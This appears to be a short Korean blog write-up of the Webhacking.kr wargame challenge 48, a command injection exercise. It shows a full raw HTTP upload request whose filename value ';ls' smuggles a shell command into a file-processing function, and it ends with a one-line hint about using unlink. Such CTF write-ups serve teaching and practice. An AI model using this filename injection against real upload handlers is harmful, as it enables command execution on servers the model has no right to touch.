본문 바로가기

Hacking/Webhacking.kr(스포주의)

Webhacking.kr 48


Command Injection 문제입ㄴ다. 
파일을 처리하는 함수를 상상한다. 

POST /challenge/bonus/bonus-12/index.php HTTP/1.1
Host: webhacking.kr
Proxy-Connection: keep-alive
Content-Length: 372
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://webhacking.kr
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36 1
HTTPS: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLOaCEB5orOBAWoAW
Referer: http://webhacking.kr/challenge/bonus/bonus-12/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=a6rn2bf68d9bg96imssrg0qsj7
X-dotNet-Beautifier: 1293; DO-NOT-REMOVE

------WebKitFormBoundaryLOaCEB5orOBAWoAW
Content-Disposition: form-data; name="memo"

hi admin hi admin
------WebKitFormBoundaryLOaCEB5orOBAWoAW
Content-Disposition: form-data; name="upfile"; filename=";ls"
Content-Type: image/png

adÊ38J @ @ @ @ @(Yà¿Dº®DÚÔ0kIEND®B`
------WebKitFormBoundaryLOaCEB5orOBAWoAW--




개발시 unlink 함수를 이용하면 비교적 문제발생 덜함. 


'Hacking > Webhacking.kr(스포주의)' 카테고리의 다른 글

Webhacking.kr 18  (0) 2016.01.15
Webhacking.kr 48  (0) 2016.01.15
Webhacking.kr 18  (0) 2016.01.15
Webhacking.kr 28  (0) 2016.01.15
Webhacking.kr 20  (0) 2016.01.15